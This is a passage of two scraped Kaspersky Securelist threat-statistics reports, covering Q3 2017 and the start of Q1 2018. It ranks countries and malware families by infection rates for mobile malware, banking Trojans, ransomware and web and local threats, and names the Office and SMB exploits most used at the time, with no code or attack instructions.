once run, it downloads and installs the application it imitated. In this case, the Trojan requests administrator rights to withstand removal. The main purpose of Trojan.AndroidOS.Hiddad.an is the aggressive display of adverts. Its main 'audience' is in Russia.\n\n#### The geography of mobile threats\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-5-en.jpg>)\n\nThe geography of attempted mobile malware infections in Q3 2017 (percentage of all users attacked)\n\n**Top 10 countries attacked by mobile malware (ranked by percentage of users attacked):**\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Iran | 35.12 \n2 | Bangladesh | 28.30 \n3 | China | 27.38 \n4 | C\u00f4te d'Ivoire | 26.22 \n5 | Algeria | 24.78 \n6 | Nigeria | 23.76 \n7 | Indonesia | 22.29 \n8 | India | 21.91 \n9 | Nepal | 20.78 \n10 | Kenya | 20.43 \n \n_* We eliminated countries from this rating where the number of users of Kaspersky Lab's mobile security product is relatively low (under 10,000). \n** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab's mobile security product in the country._\n\nFor the third quarter in a row Iran was the country with the highest percentage of users attacked by mobile malware \u2013 35.12%. Bangladesh came second, with 28.3% of users there encountering a mobile threat at least once during Q3. China (27.38%) followed in third.\n\nRussia (8.68%) came 35th this quarter (vs 26th place in Q2), France (4.9%) was 59th, the US (3.8%) 67th, Italy (5.3%) 56th, Germany (2.9%) 79th, and the UK (3.4%) 72nd.\n\nThe safest countries were Georgia (2.2%), Denmark (1.9%), and Japan (0.8%).\n\n#### Mobile banking Trojans\n\nOver the reporting period we detected 19,748 installation packages for mobile banking Trojans, which is 1.4 times less than in Q2 2017.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-6-en.jpg>)\n\nNumber of installation packages for mobile banking Trojans detected by Kaspersky Lab solutions (Q4 2016 \u2013 Q3 2017)\n\nBanker.AndroidOS.Asacub.ar became the most popular mobile banking Trojan in Q3, replacing the long-term leader Trojan-Banker.AndroidOS.Svpeng.q. These mobile banking Trojans use phishing windows to steal credit card data and logins and passwords for online banking accounts. In addition, they steal money via SMS services, including mobile banking.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-7-en.jpg>)\n\nGeography of mobile banking threats in Q3 2017 (percentage of all users attacked)\n\n**Top 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked):**\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Russia | 1.20 \n2 | Uzbekistan | 0.40 \n3 | Kazakhstan | 0.36 \n4 | Tajikistan | 0.35 \n5 | Turkey | 0.34 \n6 | Moldova | 0.31 \n7 | Ukraine | 0.29 \n8 | Kyrgyzstan | 0.27 \n9 | Belarus | 0.26 \n10 | Latvia | 0.23 \n \n_* We eliminated countries from this rating where the number of users of Kaspersky Lab's mobile security product is relatively low (under 10,000). \n** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab's mobile security product in the country._\n\nIn Q3 2017, the Top 10 countries attacked by mobile banker Trojans saw little change: Russia (1.2%) topped the ranking again. In second and third places were Uzbekistan (0.4%) and Kazakhstan (0.36%), which came fifth and tenth respectively in the previous quarter. In these countries the Faketoken.z, Tiny.b and Svpeng.y families were the most widespread threats.\n\nOf particular interest is the fact that Australia, a long-term resident at the top end of this rating, didn't make it into our Top 10 this quarter. This was due to a decrease in activity by the [Trojan-Banker.AndroidOS.Acecard](<https://securelist.com/the-evolution-of-acecard/73777/>) and Trojan-Banker.AndroidOS.Marcher mobile banking families.\n\n#### Mobile ransomware\n\nIn Q3 2017, we detected 108,073 mobile Trojan-Ransomware installation packages, which is almost half as much as in the previous quarter.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-8-en.jpg>)\n\nNumber of mobile Trojan-Ransomware installation packages detected by Kaspersky Lab (Q3 2016 \u2013 Q3 2017)\n\nIn our report for Q2, [we wrote](<https://securelist.com/it-threat-evolution-q2-2017-statistics/79432/>) that in the first half of 2017, we had discovered more mobile ransomware installation packages than in any other period. The reason was the Trojan-Ransom.AndroidOS.Congur family. However, in the third quarter of this year we observed a decline in this family's activity.\n\nTrojan-Ransom.AndroidOS.Zebt.a became the most popular mobile Trojan-Ransomware in Q3, accounting for more than a third of users attacked by mobile ransomware. Second came Trojan-Ransom.AndroidOS.Svpeng.ab. Meanwhile, [Trojan-Ransom.AndroidOS.Fusob.h](<https://securelist.com/mobile-malware-evolution-2015/73839/>), which topped the rating for several quarters in a row, was only third in Q3 2017.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-9-en.jpg>)\n\nGeography of mobile Trojan-Ransomware in Q3 2017 (percentage of all users attacked)\n\n**Top 10 countries attacked by mobile Trojan-Ransomware (ranked by percentage of users attacked):**\n\n1 | US | 1.03% \n---|---|--- \n2 | Mexico | 0.91% \n3 | Belgium | 0.85% \n4 | Kazakhstan | 0.79% \n5 | Romania | 0.70% \n6 | Italy | 0.50% \n7 | China | 0.49% \n8 | Poland | 0.49% \n9 | Austria | 0.45% \n10 | Spain | 0.33% \n \n_* We eliminated countries from this ranking where the number of users of Kaspersky Lab's mobile security product is lower than 10,000. \n** Percentage of unique users in each country attacked by mobile Trojan-Ransomware, relative to all users of Kaspersky Lab's mobile security product in the country._\n\nThe US (1.03%) again topped the rating of countries attacked most by mobile Trojan-Ransomware; the most widespread family in the country was Trojan-Ransom.AndroidOS.Svpeng. These Trojans appeared in 2014 as a modification of the Trojan-Banker.AndroidOS.Svpeng mobile banking family. They demand a ransom of about $500 from victims to unblock their devices.\n\nIn Mexico (0.91%), which came second in Q3 2017, most mobile ransomware attacks involved Trojan-Ransom.AndroidOS.Zebt.a. Belgium (0.85%) came third, with Zebt.a the main threat to users there too.\n\n## Vulnerable apps exploited by cybercriminals\n\nQ3 2017 saw continued growth in the number of attacks launched against users involving malicious Microsoft Office documents. We noted the emergence of a large number of combined documents containing an exploit as well as a phishing message \u2013 in case the embedded exploit fails.\n\nAlthough two new Microsoft Office vulnerabilities, CVE-2017-8570 and CVE-2017-8759, have emerged, cybercriminals have continued to exploit CVE-2017-0199, a logical vulnerability in processing HTA objects that was discovered in March 2017. Kaspersky Lab statistics show that attacks against 65% users in Q3 exploited CVE-2017-0199, and less than 1% exploited CVE-2017-8570 or CVE-2017-8759. The overall share of exploits for Microsoft Office was 27.8%.\n\nThere were no large network attacks (such as [WannaCry](<https://securelist.com/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/78351/>) or [ExPetr](<https://securelist.com/from-blackenergy-to-expetr/78937/>)) launched in Q3 using vulnerabilities patched by the MS17-010 update. However, according to KSN data, there was major growth throughout the quarter in the number of attempted exploitations of these vulnerabilities that were blocked by our Intrusion Detection System component. Unsurprisingly, the most popular exploits have been EternalBlue and its modifications, which use an SMB protocol vulnerability; however, KL statistics show that EternalRomance, EternalChampion and an exploit for the CVE-2017-7269 vulnerability in IIS web servers have also been actively used by cybercriminals. EternalBlue, however, accounts for millions of blocked attempted attacks per month, while the numbers for other exploits are much lower.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-10-en.jpg>)\n\nDistribution of exploits used in attacks by type of application attacked, Q3 2017\n\nThe distribution of exploits by the type of attacked application this quarter was practically the same as in Q2. First place is still occupied by exploits targeting browsers and browser components with a share of 35.0% (a decline of 4 p.p. compared to Q2.) The proportion of exploits targeting Android vulnerabilities (22.7%) was almost identical to that in Q2, placing this type of attacked application once again in third behind Office vulnerabilities.\n\n## Online threats (Web-based attacks)\n\n_These statistics are based on detection verdicts returned by the web antivirus module that protects users at the moment when malicious objects are downloaded from a malicious/infected web page. Malicious sites are specifically created by cybercriminals; infected web resources include those whose content is created by users (e.g. forums), as well as legitimate resources._\n\n### Online threats in the banking sector\n\n_These statistics are based on detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data. Beginning from the first quarter of 2017 these statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats._\n\nIn Q3 2017, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs capable of stealing money via online banking on 204,388 computers.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-11-en.jpg>)\n\nNumber of users attacked by financial malware, Q3 2017\n\n#### Geography of attacks\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM and POS-malware worldwide, we calculate the percentage of Kaspersky Lab product users in the country who encountered this type of threat during the reporting period, relative to all users of our products in that country.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-12-en.jpg>)\n\nGeography of banking malware attacks in Q3 2017 (percentage of all users attacked)\n\n**TOP 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked)**\n\n| Country* | % of users attacked** \n---|---|--- \n**1** | Togo | 2.30 \n**2** | China | 1.91 \n**3** | Taiwan | 1.65 \n**4** | Indonesia | 1.58 \n**5** | South Korea | 1.56 \n**6** | Germany | 1.53 \n**7** | United Arab Emirates | 1.52 \n**8** | Lebanon | 1.48 \n**9** | Libya | 1.43 \n**10** | Jordan | 1.33 \n \n_These statistics are based on detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data. \n* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (under 10,000). \n** Unique users whose computers have been targeted by banking Trojan malware attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\n#### TOP 10 banking malware families\n\nThe table below shows the Top 10 malware families used in Q3 2017 to attack online banking users (in terms of percentage of users attacked):\n\n| Name* | % of attacked users** \n---|---|--- \n**1** | Trojan-Spy.Win32.Zbot | 27.9 \n**2** | Trojan.Win32.Nymaim | 20.4 \n**3** | Trojan.Win32.Neurevt | 10.0 \n**4** | Trickster | 9.5 \n**5** | SpyEye | 7.5 \n**6** | Caphaw | 6.3 \n**7** | Trojan-Banker.Win32.Gozi | 2.0 \n**8** | Shiz | 1.8 \n**9** | ZAccess | 1.6 \n**10** | NeutrinoPOS | 1.6 \n \n_* The detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data. \n** Unique users whose computers have been targeted by the malware in question as a percentage of all users attacked by financial malware._\n\nThe malware families Dridex and Tinba lost their places in this quarter's Top 10. One of their former positions was occupied by the Trickster bot (accounting for 9.5% of attacked users), also known as TrickBot, a descendant of the now defunct Dyre banker. There was a small change in the leading three malicious families. First and second places are still occupied by Trojan-Spy.Win32.Zbot (27.9%) and Trojan.Win32.Nymaim (20.4%) respectively, while third place is now occupied by Trojan.Win32.Neurevt (10%) whose share grew by nearly 4 p.p.\n\n### Cryptoware programs\n\n#### Q3 highlights\n\n##### Crysis rises from the dead\n\nIn our Q2 report [we wrote](<https://securelist.com/it-threat-evolution-q2-2017-statistics/79432/>) that the cybercriminals behind the Crysis ransomware cryptor halted distribution of the malware and published the secret keys needed to decrypt files. This took place in May 2017, and all propagation of the ransomware was stopped completely at that time.\n\nHowever, nearly three months later, in mid-August, we discovered that this Trojan had come back from the dead and had set out on a new campaign of active propagation. The email addresses used by the blackmailers were different from those used in earlier samples of Crysis. A detailed analysis revealed that the new samples of the Trojan were completely identical to the old ones apart from just one thing \u2013 the public master keys were new. Everything else was the same, including the compilation timestamp in the PE header and, more interestingly, the labels that the Trojan leaves in the service area at the end of each encrypted file. Closer scrutiny of the samples suggests that the new distributors of the malware didn't have the source code, so they just took its old body and used a HEX editor to change the key and the contact email.\n\nThe above suggests that this piece of 'zombie' malware is being spread by a different group of malicious actors rather than its original developer who disclosed all the private keys in May.\n\n##### Surge in Cryrar attacks\n\nThe Cryrar cryptor (aka ACCDFISA) is a veteran among the ransomware Trojans that are currently being spread. It emerged way back in 2012 and has been active ever since. The cryptor is written in PureBasic and uses a legitimate executable RAR archiver file to place the victim's files in password-encrypted RAR-sfx archives.\n\nIn the first week of September 2017 we recorded a dramatic rise in the number of attempted infections with Cryrar \u2013 a surge never seen before or since. The malicious actors used the following approach: they crack the password to RDP by brute force, get authentication on the victim's system using the remote access protocol and manually launch the Trojan's installation file. The latter, in turn, installs the cryptor's body and the components it requires (including the renamed RAR.EXE file), and then automatically launches the cryptor.\n\nAccording to KSN data, this wave of attacks primarily targeted Vietnam, China, the Philippines and Brazil.\n\n##### Master key to original versions of Petya/Mischa/GoldenEye published\n\nIn July 2017, the authors of the [Petya Trojan](<https://securelist.com/petya-the-two-in-one-trojan/74609/>) published their master key, which can be used to decrypt the Salsa keys required to decrypt MFT and unblock access to systems affected by Petya/Mischa or GoldenEye.\n\nThis happened shortly after the [ExPetr epidemic](<https://securelist.com/schroedingers-petya/78870/>) which used part of the GoldenEye code. This suggests that the authors of Petya/Mischa/GoldenEye did so in an attempt to distance themselves from the ExPetr attack and the outcry that it caused.\n\nUnfortunately, this master key won't help those affected by ExPetr, as its creators [didn't include](<https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/>) the option of restoring a Salsa key to decrypt MFT.\n\n#### The number of new modifications\n\nIn Q3 2017, we identified five new ransomware families in this classification. It's worth noting here that this number doesn't include all the Trojans that weren't assigned their own 'personal' verdict. Each quarter, dozens of these malicious programs emerge, though they either have so few distinctive characteristics or occur so rarely that they and the hundreds of others like them remain nameless, and are detected with generic verdicts.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-13-en.jpg>)\n\nNumber of newly created cryptor modifications, Q3 2016 \u2013 Q3 2017\n\nThe number of new cryptor modifications continues to decline compared to previous quarters. This could be a temporary trend, or could indicate that cybercriminals are gradually losing their interest in cryptors as a means of making money, and are switching over to other types of malware.\n\n#### The number of users attacked by ransomware\n\nJuly was the month with the lowest ransomware activity. From July to September, the number of ransomware attacks rose, though it remained lower than May and June when two massive epidemics (WannaCry and ExPetr) struck.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-14-en.jpg>)\n\nNumber of unique users attacked by Trojan-Ransom cryptor malware (Q3 2017)\n\n#### The geography of attacks\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-15-en.jpg>)\n\n#### Top 10 countries attacked by cryptors\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Myanmar | 0.95% \n2 | Vietnam | 0.92% \n3 | Indonesia | 0.69% \n4 | Germany | 0.62% \n5 | China | 0.58% \n6 | Russia | 0.51% \n7 | Philippines | 0.50% \n8 | Venezuela | 0.50% \n9 | Cambodia | 0.50% \n10 | Austria | 0.49% \n \n_* We excluded those countries where the number of Kaspersky Lab product users is relatively small (under 50,000) \n** Unique users whose computers have been targeted by ransomware as a percentage of all unique users of Kaspersky Lab products in the country._\n\nMost of the countries in this Top 10 are from Asia, including Myanmar (0.95%), a newcomer to the Top 10 that swept into first place in Q3. Vietnam (0.92%) came second, moving up two places from Q2, while China (0.58%) rose one place to fifth.\n\nBrazil, Italy and Japan were the leaders in Q2, but in Q3 they failed to make it into the Top 10. Europe is represented by Germany (0.62%) and Austria (0.49%).\n\nRussia, in tenth the previous quarter, ended Q3 in sixth place.\n\n#### Top 10 most widespread cryptor families\n\n| **Name** | **Verdict*** | **% of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 16.78% | \n2 | Crypton | Trojan-Ransom.Win32.Cryptoff | 14.41% | \n3 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 6.90% | \n4 | Locky | Trojan-Ransom.Win32.Locky | 6.78% | \n5 | Cerber | Trojan-Ransom.Win32.Zerber | 4.30% | \n6 | Cryrar/ACCDFISA | Trojan-Ransom.Win32.Cryrar | 3.99% | \n7 | Shade | Trojan-Ransom.Win32.Shade | 2.69% | \n8 | Spora | Trojan-Ransom.Win32.Spora | 1.87% | \n9 | (generic verdict) | Trojan-Ransom.Win32.Gen | 1.77% | \n10 | (generic verdict) | Trojan-Ransom.Win32.CryFile | 1.27% | \n \n_* These statistics are based on detection verdicts received from users of Kaspersky Lab products who have consented to provide their statistical data. \n** Unique users whose computers have been targeted by a specific Trojan-Ransom family as a percentage of all users of Kaspersky Lab products attacked by Trojan-Ransom malware._\n\nWannacry (16.78%) tops the rating for Q3, and the odds are that it's set to remain there: the worm has been propagating uncontrollably, and there are still huge numbers of computers across the globe with the unpatched vulnerability that Wannacry exploits.\n\nCrypton (14.41%) came second. This cryptor emerged in spring 2016 and has undergone many modifications since. It has also been given multiple names: CryptON, JuicyLemon, PizzaCrypts, Nemesis, x3m, Cry9, Cry128, Cry36.\n\nThe cryptor Purgen (6.90%) rounds off the top three after rising from ninth. The rest of the rating is populated by 'old timers' \u2013 the Trojans Locky, Cerber, Cryrar, Shade, and Spora.\n\nThe Jaff cryptor appeared in the spring of 2017, going straight into fourth place in the Q2 rating, and then stopped spreading just as suddenly.\n\n### Top 10 countries where online resources are seeded with malware\n\n_The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn the third quarter of 2017, Kaspersky Lab solutions blocked **277,646,376** attacks launched from web resources located in 185 countries around the world. **72,012,219** unique URLs were recognized as malicious by web antivirus components.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-16-en.jpg>)\n\nDistribution of web attack sources by country, Q3 2017\n\nIn Q3 2017, the US (3.86%) was home to most sources of web attacks. The Netherlands (25.22%) remained in second place, while Germany moved up from fifth to third. Finland and Singapore dropped out of the top five and were replaced by Ireland (1.36%) and Ukraine (1.36%).\n\n**Countries where users faced the greatest risk of online infection**\n\nIn order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers work in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **_Malware_** class. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of users attacked**** \n---|---|--- \n1 | Belarus | 27.35 \n2 | Algeria | 24.23 \n3 | Russia | 23.91 \n4 | Armenia | 23.74 \n5 | Moldova | 23.61 \n6 | Greece | 21.48 \n7 | Azerbaijan | 21.14 \n8 | Kyrgyzstan | 20.83 \n9 | Uzbekistan | 20.24 \n10 | Albania | 20.10 \n11 | Ukraine | 19.82 \n12 | Kazakhstan | 19.55 \n13 | France | 18.94 \n14 | Venezuela | 18.68 \n15 | Brazil | 18.01 \n16 | Portugal | 17.93 \n17 | Vietnam | 17.81 \n18 | Tajikistan | 17.63 \n19 | Georgia | 17.50 \n20 | India | 17.43 \n \n_These statistics are based on detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data._ \n_* These calculations excluded countries where the number of Kaspersky Lab users is relatively small (under 10,000 users). \n** Unique users whose computers have been targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 16.61% of computers connected to the Internet globally were subjected to at least one **Malware-class** web attack during the quarter.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-17-en.jpg>)\n\nGeography of malicious web attacks in Q3 2017 (ranked by percentage of users attacked)\n\nThe countries with the safest online surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%) and Cuba (4.44%).\n\n## Local threats\n\n_Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q3 2017, Kaspersky Lab's file antivirus detected **198,228,428** unique malicious and potentially unwanted objects.\n\n**Countries where users faced the highest risk of local infection**\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating of malicious programs only includes **Malware-class** attacks. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of users attacked**** \n---|---|--- \n1 | Yemen | 56.89 \n2 | Vietnam | 54.32 \n3 | Afghanistan | 53.25 \n4 | Uzbekistan | 53.02 \n5 | Laos | 52.72 \n6 | Tajikistan | 49.72 \n7 | Ethiopia | 48.90 \n8 | Syria | 47.71 \n9 | Myanmar | 46.82 \n10 | Cambodia | 46.69 \n11 | Iraq | 45.79 \n12 | Turkmenistan | 45.47 \n13 | Libya | 45.00 \n14 | Bangladesh | 44.54 \n15 | China | 44.40 \n16 | Sudan | 44.27 \n17 | Mongolia | 44.18 \n18 | Mozambique | 43.84 \n19 | Rwanda | 43.22 \n20 | Belarus | 42.53 \n \n_These statistics are based on detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users' computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives._ \n_* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (under 10,000 users). \n** The percentage of unique users in the country with computers that blocked **Malware-class** local threats as a percentage of all unique users of Kaspersky Lab products._\n\nThis Top 20 of countries has not changed much since Q2, with the exception of China (44.40%), Syria (47.71%) and Libya (45.00%) all making an appearance. The proportion of users attacked in Russia amounted to 29.09%.\n\nOn average, 23.39% of computers globally faced at least one **Malware-class** local threat during the third quarter.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-18-en.jpg>)\n\nGeography of local malware attacks in Q3 2017 (ranked by percentage of users attacked)\n\n**The safest countries in terms of local infection risks **included Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czechia (7.89%), Ireland (6.86%) and Japan (5.79%).\n\n_All the statistics used in this report were obtained using [Kaspersky Security Network](<https://www.kaspersky.com/images/KESB_Whitepaper_KSN_ENG_final.pdf>) (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity._", "cvss3": {}, "published": "2017-11-10T10:45:04", "type": "securelist", "title": "IT threat evolution Q3 2017. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-7269", "CVE-2017-8570", "CVE-2017-8759"], "modified": "2017-11-10T10:45:04", "href": "https://securelist.com/it-threat-evolution-q3-2017-statistics/83131/", "id": "SECURELIST:376CB760FDD4E056A8D0695A9EB9756A", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-05-15T21:13:49", "description": "\n\n## Q1 figures\n\nAccording to KSN: \n\n * Kaspersky Lab solutions blocked 796,806,112 attacks launched from online resources located in 194 countries across the globe.\n * 282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 204,448 users.\n * Ransomware attacks were registered on the computers of 179,934 unique users.\n * Our File Anti-Virus logged 187,597,494 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 1,322,578 malicious installation packages\n * 18,912 installation packages for mobile banking Trojans\n * 8,787 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Q1 events\n\nIn Q1 2018, DNS-hijacking, a new in-the-wild method for spreading mobile malware on Android devices, was identified. As a result of hacked routers and modified DNS settings, users were redirected to IP addresses belonging to the cybercriminals, where they were prompted to download malware disguised, for example, as browser updates. That is how the Korean banking Trojan Wroba was [distributed](<https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171226/180511-it-threats-q1-18-statistics-1.png>)\n\n_This malicious resource shows a fake window while displaying the legitimate site in the address bar_\n\nIt wasn't a [drive-by-download](<https://securelist.com/threats/drive-by-attack-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) case, since the success of the attack largely depended on actions by the victim, such as installing and running the Trojan. But it's interesting to note that some devices (routers) were used to attack other devices (smartphones), all sprinkled with social engineering to make it more effective.\n\nHowever, a far greater splash in Q1 was caused by the creators of a seemingly legitimate app called GetContact.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171508/180511-it-threats-q1-18-statistics-21.png>)\n\nSome backstory to begin with. Various families and classes of malicious apps are known to gather data from infected devices: it could be a relatively harmless IMEI number, phone book contents, SMS correspondence, or even WhatsApp chats. All the above (and much more besides) is personal information that only the mobile phone owner should have control over. However, the creators of GetContact concocted a license agreement giving them the right to download the user's phone book to their servers and grant all their subscribers access to it. As a result, anyone could find out what name GetContact users had saved their phone number under, often with sad consequences. Let's hope that the app creators had the noble intention of [protecting users from telephone spam and fraudulent calls](<https://callerid.kaspersky.com/?lang=ru>), but simply chose the wrong means to do so.\n\n### Mobile threat statistics\n\nIn Q1 2018, Kaspersky Lab detected 1,322,578 malicious installation packages, down 11% against the previous quarter.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171235/180511-it-threats-q1-18-statistics-4.png>)\n\n_Number of detected malicious installation packages, Q2 2017 \u2013 Q1 2018_\n\n#### Distribution of detected mobile apps by type\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171244/180511-it-threats-q1-18-statistics-5.png>)\n\n_Distribution of newly detected mobile apps by type, Q4 2017 and Q1 2018 _\n\nAmong all the threats detected in Q1 2018, the lion's share belonged to potentially unwanted RiskTool apps (49.3%); compared to the previous quarter, their share fell by 5.5%. Members of the RiskTool.AndroidOS.SMSreg family contributed most to this indicator.\n\nSecond place was taken by Trojan-Dropper threats (21%), whose share doubled. Most detected files of this type came from the Trojan-Dropper.AndroidOS.Piom family.\n\nAdvertising apps, which ranked second in Q4 2017, dropped a place\u2014their share decreased by 8%, accounting for 11% of all detected threats.\n\nOn a separate note, Q1 saw a rise in the share of mobile banking threats. This was due to the mass distribution of Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### TOP 20 mobile malware\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware._\n\n | Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 70.17 \n2 | Trojan.AndroidOS.Boogr.gsh | 12.92 \n3 | Trojan.AndroidOS.Agent.rx | 5.55 \n4 | Trojan-Dropper.AndroidOS.Lezok.p | 5.23 \n5 | Trojan-Dropper.AndroidOS.Hqwar.ba | 2.95 \n6 | Trojan.AndroidOS.Triada.dl | 2.94 \n7 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.51 \n8 | Trojan.AndroidOS.Piom.rfw | 2.13 \n9 | Trojan-Dropper.AndroidOS.Lezok.t | 2.06 \n10 | Trojan.AndroidOS.Piom.pnl | 1.78 \n11 | Trojan-Dropper.AndroidOS.Agent.ii | 1.76 \n12 | Trojan-SMS.AndroidOS.FakeInst.ei | 1.64 \n13 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.50 \n14 | Trojan-Ransom.AndroidOS.Zebt.a | 1.48 \n15 | Trojan.AndroidOS.Piom.qmx | 1.47 \n16 | Trojan.AndroidOS.Dvmap.a | 1.40 \n17 | Trojan-SMS.AndroidOS.Agent.xk | 1.35 \n18 | Trojan.AndroidOS.Triada.snt | 1.24 \n19 | Trojan-Dropper.AndroidOS.Lezok.b | 1.22 \n20 | Trojan-Dropper.AndroidOS.Tiny.d | 1.22 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._\n\nAs before, first place in our TOP 20 went to DangerousObject.Multi.Generic (70.17%), the verdict we use for malware detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies work when the anti-virus databases lack data for detecting a piece of malware, but the cloud of the anti-virus company already contains information about the object. This is basically how the latest malicious programs are detected.\n\nIn second place was Trojan.AndroidOS.Boogr.gsh (12.92%). This verdict is given to files recognized as malicious by our system based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nThird was Trojan.AndroidOS.Agent.rx (5.55%). Operating in background mode, this Trojan's task is to covertly visit web pages as instructed by its C&amp;C.\n\nFourth and fifth places went to the Trojan _matryoshkas_ Trojan-Dropper.AndroidOS.Lezok.p (5.2%) and Trojan-Dropper.AndroidOS.Hqwar.ba (2.95%), respectively. Note that in Q1 threats like Trojan-Dropper effectively owned the TOP 20, occupying eight positions in the rating. The main tasks of such droppers are to drop a payload on the victim, avoid detection by security software, and complicate the reverse engineering process. In the case of Lezok, an aggressive advertising app acts as the payload, while Hqwar can conceal a banking Trojan or ransomware.\n\nSixth place in the rating was taken by the unusual Trojan Triada.dl (2.94%) from the [Trojan.AndroidOS.Triada](<https://threats.kaspersky.com/en/threat/Trojan.AndroidOS.Triada/>) family of modular-designed malware, which we have written about many times. The Trojan was notable for its highly sophisticated attack vector: it modified the main system library libandroid_runtime.so so that malicious code started when any debugging output was written to the system event log. Devices with the modified library ended up on store shelves, thus ensuring that the infection began early. The capabilities of Triada.dl are almost limitless: it can be embedded in apps already installed and pinch data from them, and it can show the user fake data in \"clean\" apps.\n\nThe Trojan ransomware Trojan-Trojan-Ransom.AndroidOS.Zebt.a (1.48%) finished 14th. It features a quaint set of functions, including hiding the icon at startup and requesting device administrator rights to counteract deletion. Like other such mobile ransomware, the malware is distributed under the guise of a porn app.\n\nAnother interesting resident in the TOP 20 is Trojan-SMS.AndroidOS.Agent.xk (1.35%), which operates like the SMS Trojans of 2011. The malware displays a welcome screen offering various services, generally access to content. At the bottom in fine print it is written that the services are fee-based and subscription to them is via SMS.\n\n#### Geography of mobile threats\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171253/180511-it-threats-q1-18-statistics-6.png>)\n\n_Map of attempted infections using 